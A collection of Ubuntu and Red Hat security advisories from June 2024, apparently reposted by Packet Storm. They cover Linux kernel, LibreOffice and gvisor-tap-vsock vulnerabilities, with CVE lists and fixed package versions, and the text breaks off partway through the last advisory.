Ubuntu Security Notice 6820-2 - It was discovered that the ATA over Ethernet driver in the Linux kernel contained a race condition, leading to a use-after-free vulnerability. An attacker could use this to cause a denial of service or possibly execute arbitrary code. It was discovered that the Atheros 802.11ac wireless driver did not properly validate certain data structures, leading to a NULL pointer dereference. An attacker could possibly use this to cause a denial of service.

    ==========================================================================Ubuntu Security Notice USN-6820-2June 11, 2024linux-nvidia vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-nvidia: Linux kernel for NVIDIA systemsDetails:It was discovered that the ATA over Ethernet (AoE) driver in the Linuxkernel contained a race condition, leading to a use-after-freevulnerability. An attacker could use this to cause a denial of service orpossibly execute arbitrary code. (CVE-2023-6270)It was discovered that the Atheros 802.11ac wireless driver did notproperly validate certain data structures, leading to a NULL pointerdereference. An attacker could possibly use this to cause a denial ofservice. (CVE-2023-7042)It was discovered that the HugeTLB file system component of the LinuxKernel contained a NULL pointer dereference vulnerability. A privilegedattacker could possibly use this to to cause a denial of service.(CVE-2024-0841)It was discovered that the Intel Data Streaming and Intel AnalyticsAccelerator drivers in the Linux kernel allowed direct access to thedevices for unprivileged users and virtual machines. A local attacker coulduse this to cause a denial of service. (CVE-2024-21823)Yuxuan Hu discovered that the Bluetooth RFCOMM protocol driver in the LinuxKernel contained a race condition, leading to a NULL pointer dereference.An attacker could possibly use this to cause a denial of service (systemcrash). (CVE-2024-22099)It was discovered that the MediaTek SoC Gigabit Ethernet driver in theLinux kernel contained a race condition when stopping the device. A localattacker could possibly use this to cause a denial of service (deviceunavailability). (CVE-2024-27432)Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:   - ARM32 architecture;   - RISC-V architecture;   - x86 architecture;   - ACPI drivers;   - Block layer subsystem;   - Clock framework and drivers;   - CPU frequency scaling framework;   - Cryptographic API;   - DMA engine subsystem;   - EFI core;   - GPU drivers;   - InfiniBand drivers;   - IOMMU subsystem;   - Multiple devices driver;   - Media drivers;   - MMC subsystem;   - Network drivers;   - NTB driver;   - NVME drivers;   - PCI subsystem;   - MediaTek PM domains;   - Power supply drivers;   - SPI subsystem;   - Media staging drivers;   - TCM subsystem;   - USB subsystem;   - Framebuffer layer;   - AFS file system;   - File systems infrastructure;   - BTRFS file system;   - EROFS file system;   - Ext4 file system;   - F2FS file system;   - Network file system client;   - NTFS3 file system;   - Diskquota system;   - SMB network file system;   - BPF subsystem;   - Netfilter;   - TLS protocol;   - io_uring subsystem;   - Bluetooth subsystem;   - Memory management;   - Ethernet bridge;   - Networking core;   - HSR network protocol;   - IPv4 networking;   - IPv6 networking;   - L2TP protocol;   - MAC80211 subsystem;   - Multipath TCP;   - Netlink;   - NET/ROM layer;   - Packet sockets;   - RDS protocol;   - Sun RPC protocol;   - Unix domain sockets;   - Wireless networking;   - USB sound devices;(CVE-2024-26776, CVE-2024-26802, CVE-2024-26790, CVE-2024-27388,CVE-2024-27077, CVE-2024-26884, CVE-2024-26779, CVE-2024-26897,CVE-2024-27045, CVE-2024-26851, CVE-2024-27065, CVE-2024-26843,CVE-2024-26743, CVE-2024-27052, CVE-2024-26855, CVE-2024-27436,CVE-2024-27078, CVE-2024-26898, CVE-2024-27405, CVE-2024-26894,CVE-2024-26584, CVE-2024-26915, CVE-2024-26763, CVE-2024-27047,CVE-2024-26809, CVE-2024-26883, CVE-2024-26901, CVE-2024-27412,CVE-2024-26803, CVE-2024-26751, CVE-2024-35829, CVE-2024-27432,CVE-2023-52447, CVE-2024-26748, CVE-2024-27051, CVE-2023-52434,CVE-2024-26749, CVE-2024-27034, CVE-2024-27390, CVE-2024-26879,CVE-2024-26859, CVE-2024-26835, CVE-2024-26861, CVE-2024-27030,CVE-2024-27415, CVE-2023-52656, CVE-2024-26773, CVE-2024-27043,CVE-2024-26601, CVE-2024-27073, CVE-2024-26782, CVE-2024-27413,CVE-2024-26880, CVE-2024-26793, CVE-2024-26766, CVE-2024-26750,CVE-2024-26852, CVE-2024-26805, CVE-2024-35830, CVE-2024-26798,CVE-2023-52644, CVE-2024-26787, CVE-2024-26846, CVE-2024-26857,CVE-2024-26752, CVE-2024-26792, CVE-2023-52641, CVE-2024-26771,CVE-2024-26736, CVE-2024-27417, CVE-2024-26840, CVE-2024-26838,CVE-2024-26820, CVE-2024-26778, CVE-2024-26688, CVE-2024-27403,CVE-2024-26862, CVE-2024-27038, CVE-2024-26839, CVE-2024-26889,CVE-2024-26774, CVE-2024-26907, CVE-2023-52645, CVE-2024-27431,CVE-2024-27410, CVE-2024-27416, CVE-2024-26795, CVE-2023-52497,CVE-2024-27419, CVE-2024-26744, CVE-2024-26833, CVE-2024-26735,CVE-2024-26651, CVE-2024-27074, CVE-2023-52652, CVE-2024-27044,CVE-2024-26733, CVE-2024-26659, CVE-2024-35811, CVE-2024-27053,CVE-2024-27037, CVE-2023-52620, CVE-2024-26882, CVE-2024-35828,CVE-2024-26856, CVE-2024-26881, CVE-2024-27075, CVE-2024-26583,CVE-2023-52662, CVE-2024-26788, CVE-2024-26903, CVE-2024-26870,CVE-2024-26777, CVE-2024-26874, CVE-2024-26906, CVE-2024-26872,CVE-2024-26895, CVE-2024-26845, CVE-2024-27024, CVE-2024-27076,CVE-2024-26603, CVE-2024-27054, CVE-2024-26754, CVE-2024-35844,CVE-2024-26764, CVE-2024-26885, CVE-2024-26772, CVE-2024-26804,CVE-2024-26585, CVE-2024-26791, CVE-2024-27414, CVE-2024-26878,CVE-2024-26816, CVE-2024-27046, CVE-2024-26891, CVE-2024-26875,CVE-2024-26747, CVE-2024-26863, CVE-2023-52640, CVE-2023-52650,CVE-2024-27039, CVE-2024-26877, CVE-2024-26801, CVE-2024-35845,CVE-2024-26769, CVE-2024-27028, CVE-2024-26737)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS   linux-image-5.15.0-1058-nvidia  5.15.0-1058.59   linux-image-5.15.0-1058-nvidia-lowlatency  5.15.0-1058.59   linux-image-nvidia              5.15.0.1058.58   linux-image-nvidia-lowlatency   5.15.0.1058.58After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6820-2   https://ubuntu.com/security/notices/USN-6820-1   CVE-2023-52434, CVE-2023-52447, CVE-2023-52497, CVE-2023-52620,   CVE-2023-52640, CVE-2023-52641, CVE-2023-52644, CVE-2023-52645,   CVE-2023-52650, CVE-2023-52652, CVE-2023-52656, CVE-2023-52662,   CVE-2023-6270, CVE-2023-7042, CVE-2024-0841, CVE-2024-21823,   CVE-2024-22099, CVE-2024-26583, CVE-2024-26584, CVE-2024-26585,   CVE-2024-26601, CVE-2024-26603, CVE-2024-26651, CVE-2024-26659,   CVE-2024-26688, CVE-2024-26733, CVE-2024-26735, CVE-2024-26736,   CVE-2024-26737, CVE-2024-26743, CVE-2024-26744, CVE-2024-26747,   CVE-2024-26748, CVE-2024-26749, CVE-2024-26750, CVE-2024-26751,   CVE-2024-26752, CVE-2024-26754, CVE-2024-26763, CVE-2024-26764,   CVE-2024-26766, CVE-2024-26769, CVE-2024-26771, CVE-2024-26772,   CVE-2024-26773, CVE-2024-26774, CVE-2024-26776, CVE-2024-26777,   CVE-2024-26778, CVE-2024-26779, CVE-2024-26782, CVE-2024-26787,   CVE-2024-26788, CVE-2024-26790, CVE-2024-26791, CVE-2024-26792,   CVE-2024-26793, CVE-2024-26795, CVE-2024-26798, CVE-2024-26801,   CVE-2024-26802, CVE-2024-26803, CVE-2024-26804, CVE-2024-26805,   CVE-2024-26809, CVE-2024-26816, CVE-2024-26820, CVE-2024-26833,   CVE-2024-26835, CVE-2024-26838, CVE-2024-26839, CVE-2024-26840,   CVE-2024-26843, CVE-2024-26845, CVE-2024-26846, CVE-2024-26851,   CVE-2024-26852, CVE-2024-26855, CVE-2024-26856, CVE-2024-26857,   CVE-2024-26859, CVE-2024-26861, CVE-2024-26862, CVE-2024-26863,   CVE-2024-26870, CVE-2024-26872, CVE-2024-26874, CVE-2024-26875,   CVE-2024-26877, CVE-2024-26878, CVE-2024-26879, CVE-2024-26880,   CVE-2024-26881, CVE-2024-26882, CVE-2024-26883, CVE-2024-26884,   CVE-2024-26885, CVE-2024-26889, CVE-2024-26891, CVE-2024-26894,   CVE-2024-26895, CVE-2024-26897, CVE-2024-26898, CVE-2024-26901,   CVE-2024-26903, CVE-2024-26906, CVE-2024-26907, CVE-2024-26915,   CVE-2024-27024, CVE-2024-27028, CVE-2024-27030, CVE-2024-27034,   CVE-2024-27037, CVE-2024-27038, CVE-2024-27039, CVE-2024-27043,   CVE-2024-27044, CVE-2024-27045, CVE-2024-27046, CVE-2024-27047,   CVE-2024-27051, CVE-2024-27052, CVE-2024-27053, CVE-2024-27054,   CVE-2024-27065, CVE-2024-27073, CVE-2024-27074, CVE-2024-27075,   CVE-2024-27076, CVE-2024-27077, CVE-2024-27078, CVE-2024-27388,   CVE-2024-27390, CVE-2024-27403, CVE-2024-27405, CVE-2024-27410,   CVE-2024-27412, CVE-2024-27413, CVE-2024-27414, CVE-2024-27415,   CVE-2024-27416, CVE-2024-27417, CVE-2024-27419, CVE-2024-27431,   CVE-2024-27432, CVE-2024-27436, CVE-2024-35811, CVE-2024-35828,   CVE-2024-35829, CVE-2024-35830, CVE-2024-35844, CVE-2024-35845Package Information:   https://launchpad.net/ubuntu/+source/linux-nvidia/5.15.0-1058.59

Ubuntu Security Notice USN-6820-2

Ubuntu Security Notice 6828-1 - Zheng Wang discovered that the Broadcom FullMAC WLAN driver in the Linux kernel contained a race condition during device removal, leading to a use- after-free vulnerability. A physically proximate attacker could possibly use this to cause a denial of service. It was discovered that the ATA over Ethernet driver in the Linux kernel contained a race condition, leading to a use-after-free vulnerability. An attacker could use this to cause a denial of service or possibly execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-6828-1June 11, 2024linux-intel-iotg-5.15 vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-intel-iotg-5.15: Linux kernel for Intel IoT platformsDetails:Zheng Wang discovered that the Broadcom FullMAC WLAN driver in the Linuxkernel contained a race condition during device removal, leading to a use-after-free vulnerability. A physically proximate attacker could possiblyuse this to cause a denial of service (system crash). (CVE-2023-47233)It was discovered that the ATA over Ethernet (AoE) driver in the Linuxkernel contained a race condition, leading to a use-after-freevulnerability. An attacker could use this to cause a denial of service orpossibly execute arbitrary code. (CVE-2023-6270)It was discovered that the Atheros 802.11ac wireless driver did notproperly validate certain data structures, leading to a NULL pointerdereference. An attacker could possibly use this to cause a denial ofservice. (CVE-2023-7042)It was discovered that the HugeTLB file system component of the LinuxKernel contained a NULL pointer dereference vulnerability. A privilegedattacker could possibly use this to to cause a denial of service.(CVE-2024-0841)It was discovered that the Open vSwitch implementation in the Linux kernelcould overflow its stack during recursive action operations under certainconditions. A local attacker could use this to cause a denial of service(system crash). (CVE-2024-1151)Sander Wiebing, Alvise de Faveri Tron, Herbert Bos, and Cristiano Giuffridadiscovered that the Linux kernel mitigations for the initial Branch HistoryInjection vulnerability (CVE-2022-0001) were insufficient for Intelprocessors. A local attacker could potentially use this to expose sensitiveinformation. (CVE-2024-2201)Yuxuan Hu discovered that the Bluetooth RFCOMM protocol driver in the LinuxKernel contained a race condition, leading to a NULL pointer dereference.An attacker could possibly use this to cause a denial of service (systemcrash). (CVE-2024-22099)Chenyuan Yang discovered that the RDS Protocol implementation in the Linuxkernel contained an out-of-bounds read vulnerability. An attacker could usethis to possibly cause a denial of service (system crash). (CVE-2024-23849)Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:   - ARM32 architecture;   - PowerPC architecture;   - RISC-V architecture;   - S390 architecture;   - Core kernel;   - x86 architecture;   - Block layer subsystem;   - ACPI drivers;   - Android drivers;   - Power management core;   - Bus devices;   - Hardware random number generator core;   - Clock framework and drivers;   - CPU frequency scaling framework;   - Cryptographic API;   - Device frequency scaling framework;   - DMA engine subsystem;   - ARM SCMI message protocol;   - EFI core;   - GPU drivers;   - HID subsystem;   - Hardware monitoring drivers;   - I2C subsystem;   - IIO ADC drivers;   - IIO subsystem;   - IIO Magnetometer sensors drivers;   - InfiniBand drivers;   - IOMMU subsystem;   - Multiple devices driver;   - Media drivers;   - MMC subsystem;   - Network drivers;   - NTB driver;   - NVME drivers;   - PCI subsystem;   - PCI driver for MicroSemi Switchtec;   - PHY drivers;   - MediaTek PM domains;   - Power supply drivers;   - SCSI drivers;   - SPI subsystem;   - Media staging drivers;   - TCM subsystem;   - USB subsystem;   - DesignWare USB3 driver;   - Framebuffer layer;   - AFS file system;   - File systems infrastructure;   - BTRFS file system;   - Ceph distributed file system;   - EROFS file system;   - Ext4 file system;   - F2FS file system;   - JFS file system;   - Network file system client;   - NILFS2 file system;   - NTFS3 file system;   - Pstore file system;   - Diskquota system;   - SMB network file system;   - BPF subsystem;   - Memory management;   - Netfilter;   - TLS protocol;   - io_uring subsystem;   - Bluetooth subsystem;   - Ethernet bridge;   - CAN network layer;   - Networking core;   - HSR network protocol;   - IPv4 networking;   - IPv6 networking;   - L2TP protocol;   - Logical Link layer;   - MAC80211 subsystem;   - Multipath TCP;   - Netlink;   - NET/ROM layer;   - NFC subsystem;   - Packet sockets;   - RDS protocol;   - SMC sockets;   - Sun RPC protocol;   - TIPC protocol;   - Unix domain sockets;   - Wireless networking;   - Tomoyo security module;   - Realtek audio codecs;   - USB sound devices;(CVE-2024-26910, CVE-2024-27074, CVE-2023-52494, CVE-2023-52594,CVE-2024-26915, CVE-2024-26766, CVE-2023-52489, CVE-2024-35845,CVE-2024-26846, CVE-2024-26898, CVE-2024-26897, CVE-2024-26826,CVE-2024-26798, CVE-2023-52662, CVE-2024-26856, CVE-2023-52608,CVE-2024-26782, CVE-2024-27047, CVE-2024-27390, CVE-2024-26610,CVE-2024-26804, CVE-2023-52638, CVE-2024-26771, CVE-2024-26752,CVE-2024-26585, CVE-2024-26645, CVE-2024-26715, CVE-2024-27028,CVE-2024-26809, CVE-2024-26880, CVE-2024-27432, CVE-2024-27065,CVE-2024-26717, CVE-2023-52616, CVE-2024-26748, CVE-2024-26795,CVE-2024-26671, CVE-2024-26743, CVE-2024-27412, CVE-2024-26802,CVE-2024-26733, CVE-2024-26736, CVE-2023-52618, CVE-2024-27046,CVE-2024-26688, CVE-2024-26679, CVE-2024-26769, CVE-2024-27051,CVE-2024-26603, CVE-2024-26744, CVE-2023-52434, CVE-2024-26697,CVE-2024-27075, CVE-2023-52583, CVE-2024-26583, CVE-2024-27403,CVE-2024-26907, CVE-2024-26636, CVE-2024-27410, CVE-2023-52530,CVE-2024-26840, CVE-2024-26851, CVE-2024-26862, CVE-2023-52640,CVE-2024-35829, CVE-2024-26906, CVE-2024-26777, CVE-2024-27419,CVE-2024-26664, CVE-2024-26627, CVE-2024-26859, CVE-2023-52486,CVE-2023-52652, CVE-2024-26835, CVE-2024-35844, CVE-2024-26702,CVE-2024-26635, CVE-2024-26704, CVE-2023-52633, CVE-2024-26816,CVE-2024-26894, CVE-2024-26778, CVE-2023-52599, CVE-2024-35828,CVE-2024-26776, CVE-2023-52493, CVE-2024-26845, CVE-2024-26594,CVE-2024-26885, CVE-2024-26829, CVE-2023-52645, CVE-2024-26695,CVE-2023-52615, CVE-2024-26651, CVE-2024-26843, CVE-2023-52606,CVE-2024-26675, CVE-2024-26874, CVE-2024-26883, CVE-2024-26772,CVE-2024-26673, CVE-2024-26737, CVE-2023-52631, CVE-2024-26640,CVE-2023-52598, CVE-2024-26735, CVE-2024-26895, CVE-2024-26592,CVE-2023-52492, CVE-2024-26861, CVE-2023-52644, CVE-2024-26920,CVE-2024-26877, CVE-2024-26863, CVE-2024-26720, CVE-2024-26722,CVE-2024-27045, CVE-2024-27038, CVE-2024-26763, CVE-2024-26833,CVE-2024-27417, CVE-2024-26916, CVE-2024-26857, CVE-2024-26875,CVE-2024-26606, CVE-2024-27024, CVE-2024-26615, CVE-2023-52614,CVE-2023-52641, CVE-2024-26600, CVE-2024-27043, CVE-2023-52635,CVE-2024-26787, CVE-2024-26622, CVE-2024-27413, CVE-2024-26791,CVE-2023-52622, CVE-2023-52491, CVE-2023-52604, CVE-2024-27037,CVE-2024-26881, CVE-2024-26754, CVE-2024-26659, CVE-2024-26663,CVE-2024-26747, CVE-2023-52602, CVE-2024-26712, CVE-2024-26839,CVE-2024-26749, CVE-2024-26764, CVE-2024-26820, CVE-2024-26882,CVE-2024-27039, CVE-2024-27078, CVE-2024-26889, CVE-2024-26870,CVE-2024-26788, CVE-2024-26602, CVE-2024-26903, CVE-2024-27044,CVE-2024-27073, CVE-2023-52601, CVE-2023-52595, CVE-2024-26707,CVE-2024-27415, CVE-2023-52637, CVE-2024-26660, CVE-2024-27414,CVE-2024-27054, CVE-2023-52497, CVE-2024-26801, CVE-2023-52435,CVE-2023-52620, CVE-2023-52627, CVE-2024-26698, CVE-2023-52597,CVE-2024-27077, CVE-2023-52650, CVE-2024-26750, CVE-2024-26852,CVE-2024-27053, CVE-2023-52656, CVE-2024-26625, CVE-2024-26779,CVE-2024-27431, CVE-2024-26751, CVE-2024-26684, CVE-2024-26803,CVE-2024-26593, CVE-2023-52642, CVE-2023-52447, CVE-2024-26790,CVE-2024-26825, CVE-2024-26668, CVE-2023-52607, CVE-2024-26872,CVE-2024-27030, CVE-2023-52643, CVE-2024-26901, CVE-2024-35830,CVE-2024-26855, CVE-2023-52588, CVE-2023-52587, CVE-2024-26891,CVE-2024-26644, CVE-2024-26884, CVE-2024-26793, CVE-2024-26805,CVE-2024-26584, CVE-2024-27405, CVE-2023-52623, CVE-2024-26608,CVE-2024-26878, CVE-2024-27388, CVE-2024-27416, CVE-2024-26685,CVE-2024-27034, CVE-2024-26879, CVE-2024-26614, CVE-2024-26792,CVE-2023-52617, CVE-2024-26773, CVE-2024-26665, CVE-2024-26641,CVE-2023-52619, CVE-2024-35811, CVE-2024-27052, CVE-2024-27076,CVE-2024-26838, CVE-2024-26808, CVE-2024-26696, CVE-2024-26676,CVE-2024-26689, CVE-2024-26774, CVE-2024-26601, CVE-2023-52498,CVE-2024-27436)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS   linux-image-5.15.0-1058-intel-iotg  5.15.0-1058.64~20.04.1   linux-image-intel               5.15.0.1058.64~20.04.1   linux-image-intel-iotg          5.15.0.1058.64~20.04.1After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6828-1   CVE-2023-47233, CVE-2023-52434, CVE-2023-52435, CVE-2023-52447,   CVE-2023-52486, CVE-2023-52489, CVE-2023-52491, CVE-2023-52492,   CVE-2023-52493, CVE-2023-52494, CVE-2023-52497, CVE-2023-52498,   CVE-2023-52530, CVE-2023-52583, CVE-2023-52587, CVE-2023-52588,   CVE-2023-52594, CVE-2023-52595, CVE-2023-52597, CVE-2023-52598,   CVE-2023-52599, CVE-2023-52601, CVE-2023-52602, CVE-2023-52604,   CVE-2023-52606, CVE-2023-52607, CVE-2023-52608, CVE-2023-52614,   CVE-2023-52615, CVE-2023-52616, CVE-2023-52617, CVE-2023-52618,   CVE-2023-52619, CVE-2023-52620, CVE-2023-52622, CVE-2023-52623,   CVE-2023-52627, CVE-2023-52631, CVE-2023-52633, CVE-2023-52635,   CVE-2023-52637, CVE-2023-52638, CVE-2023-52640, CVE-2023-52641,   CVE-2023-52642, CVE-2023-52643, CVE-2023-52644, CVE-2023-52645,   CVE-2023-52650, CVE-2023-52652, CVE-2023-52656, CVE-2023-52662,   CVE-2023-6270, CVE-2023-7042, CVE-2024-0841, CVE-2024-1151,   CVE-2024-2201, CVE-2024-22099, CVE-2024-23849, CVE-2024-26583,   CVE-2024-26584, CVE-2024-26585, CVE-2024-26592, CVE-2024-26593,   CVE-2024-26594, CVE-2024-26600, CVE-2024-26601, CVE-2024-26602,   CVE-2024-26603, CVE-2024-26606, CVE-2024-26608, CVE-2024-26610,   CVE-2024-26614, CVE-2024-26615, CVE-2024-26622, CVE-2024-26625,   CVE-2024-26627, CVE-2024-26635, CVE-2024-26636, CVE-2024-26640,   CVE-2024-26641, CVE-2024-26644, CVE-2024-26645, CVE-2024-26651,   CVE-2024-26659, CVE-2024-26660, CVE-2024-26663, CVE-2024-26664,   CVE-2024-26665, CVE-2024-26668, CVE-2024-26671, CVE-2024-26673,   CVE-2024-26675, CVE-2024-26676, CVE-2024-26679, CVE-2024-26684,   CVE-2024-26685, CVE-2024-26688, CVE-2024-26689, CVE-2024-26695,   CVE-2024-26696, CVE-2024-26697, CVE-2024-26698, CVE-2024-26702,   CVE-2024-26704, CVE-2024-26707, CVE-2024-26712, CVE-2024-26715,   CVE-2024-26717, CVE-2024-26720, CVE-2024-26722, CVE-2024-26733,   CVE-2024-26735, CVE-2024-26736, CVE-2024-26737, CVE-2024-26743,   CVE-2024-26744, CVE-2024-26747, CVE-2024-26748, CVE-2024-26749,   CVE-2024-26750, CVE-2024-26751, CVE-2024-26752, CVE-2024-26754,   CVE-2024-26763, CVE-2024-26764, CVE-2024-26766, CVE-2024-26769,   CVE-2024-26771, CVE-2024-26772, CVE-2024-26773, CVE-2024-26774,   CVE-2024-26776, CVE-2024-26777, CVE-2024-26778, CVE-2024-26779,   CVE-2024-26782, CVE-2024-26787, CVE-2024-26788, CVE-2024-26790,   CVE-2024-26791, CVE-2024-26792, CVE-2024-26793, CVE-2024-26795,   CVE-2024-26798, CVE-2024-26801, CVE-2024-26802, CVE-2024-26803,   CVE-2024-26804, CVE-2024-26805, CVE-2024-26808, CVE-2024-26809,   CVE-2024-26816, CVE-2024-26820, CVE-2024-26825, CVE-2024-26826,   CVE-2024-26829, CVE-2024-26833, CVE-2024-26835, CVE-2024-26838,   CVE-2024-26839, CVE-2024-26840, CVE-2024-26843, CVE-2024-26845,   CVE-2024-26846, CVE-2024-26851, CVE-2024-26852, CVE-2024-26855,   CVE-2024-26856, CVE-2024-26857, CVE-2024-26859, CVE-2024-26861,   CVE-2024-26862, CVE-2024-26863, CVE-2024-26870, CVE-2024-26872,   CVE-2024-26874, CVE-2024-26875, CVE-2024-26877, CVE-2024-26878,   CVE-2024-26879, CVE-2024-26880, CVE-2024-26881, CVE-2024-26882,   CVE-2024-26883, CVE-2024-26884, CVE-2024-26885, CVE-2024-26889,   CVE-2024-26891, CVE-2024-26894, CVE-2024-26895, CVE-2024-26897,   CVE-2024-26898, CVE-2024-26901, CVE-2024-26903, CVE-2024-26906,   CVE-2024-26907, CVE-2024-26910, CVE-2024-26915, CVE-2024-26916,   CVE-2024-26920, CVE-2024-27024, CVE-2024-27028, CVE-2024-27030,   CVE-2024-27034, CVE-2024-27037, CVE-2024-27038, CVE-2024-27039,   CVE-2024-27043, CVE-2024-27044, CVE-2024-27045, CVE-2024-27046,   CVE-2024-27047, CVE-2024-27051, CVE-2024-27052, CVE-2024-27053,   CVE-2024-27054, CVE-2024-27065, CVE-2024-27073, CVE-2024-27074,   CVE-2024-27075, CVE-2024-27076, CVE-2024-27077, CVE-2024-27078,   CVE-2024-27388, CVE-2024-27390, CVE-2024-27403, CVE-2024-27405,   CVE-2024-27410, CVE-2024-27412, CVE-2024-27413, CVE-2024-27414,   CVE-2024-27415, CVE-2024-27416, CVE-2024-27417, CVE-2024-27419,   CVE-2024-27431, CVE-2024-27432, CVE-2024-27436, CVE-2024-35811,   CVE-2024-35828, CVE-2024-35829, CVE-2024-35830, CVE-2024-35844,   CVE-2024-35845Package Information: https://launchpad.net/ubuntu/+source/linux-intel-iotg-5.15/5.15.0-1058.64~20.04.1

Ubuntu Security Notice USN-6828-1

Red Hat Security Advisory 2024-3859-03 - An update for kernel is now available for Red Hat Enterprise Linux 8.6 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.6 Update Services for SAP Solutions, and Red Hat Enterprise Linux 8.6 Telecommunications Update Service. Issues addressed include a use-after-free vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_3859.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: kernel security updateAdvisory ID:        RHSA-2024:3859-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:3859Issue date:         2024-06-12Revision:           03CVE Names:          CVE-2023-4155====================================================================Summary: An update for kernel is now available for Red Hat Enterprise Linux 8.6 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.6 Update Services for SAP Solutions, and Red Hat Enterprise Linux 8.6 Telecommunications Update Service.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The kernel packages contain the Linux kernel, the core of any Linux operating system.Security Fix(es):* kernel: KVM: SEV-ES / SEV-SNP VMGEXIT double fetch vulnerability (CVE-2023-4155)* kernel: bluetooth: bt_sock_ioctl race condition leads to use-after-free in bt_sock_recvmsg (CVE-2023-51779)* kernel: wifi: mac80211: fix potential key use-after-free (CVE-2023-52530)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-4155References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2213802https://bugzilla.redhat.com/show_bug.cgi?id=2256822https://bugzilla.redhat.com/show_bug.cgi?id=2267787

Red Hat Security Advisory 2024-3859-03

Red Hat Security Advisory 2024-3835-03 - An update for libreoffice is now available for Red Hat Enterprise Linux 9.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_3835.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: libreoffice security updateAdvisory ID:        RHSA-2024:3835-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:3835Issue date:         2024-06-12Revision:           03CVE Names:          CVE-2023-6185====================================================================Summary: An update for libreoffice is now available for Red Hat Enterprise Linux 9.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:LibreOffice is an open source, community-developed office productivity suite. It includes key desktop applications, such as a word processor, a spreadsheet, a presentation manager, a formula editor, and a drawing program. LibreOffice replaces OpenOffice and provides a similar but enhanced and extended office suite.Security Fix(es):* libreoffice: Improper Input Validation leading to arbitrary gstreamer plugin execution (CVE-2023-6185)* libreoffice: Insufficient macro permission validation leading to macro execution (CVE-2023-6186)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-6185References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2254003https://bugzilla.redhat.com/show_bug.cgi?id=2254005

Red Hat Security Advisory 2024-3835-03

Red Hat Security Advisory 2024-3830-03 - An update for gvisor-tap-vsock is now available for Red Hat Enterprise Linux 9. Issues addressed include a memory exhaustion vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_3830.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: gvisor-tap-vsock security and bug fix updateAdvisory ID:        RHSA-2024:3830-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:3830Issue date:         2024-06-12Revision:           03CVE Names:          CVE-2023-45290====================================================================Summary: An update for gvisor-tap-vsock is now available for Red Hat Enterprise Linux 9.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:A replacement for libslirp and VPNKit, written in pure Go. It is based on the network stack of gVisor and is used to provide networking for podman-machine virtual machines. Compared to libslirp, gvisor-tap-vsock brings a configurable DNS server and dynamic port forwarding.Security Fix(es):* golang: net/http: memory exhaustion in Request.ParseMultipartForm 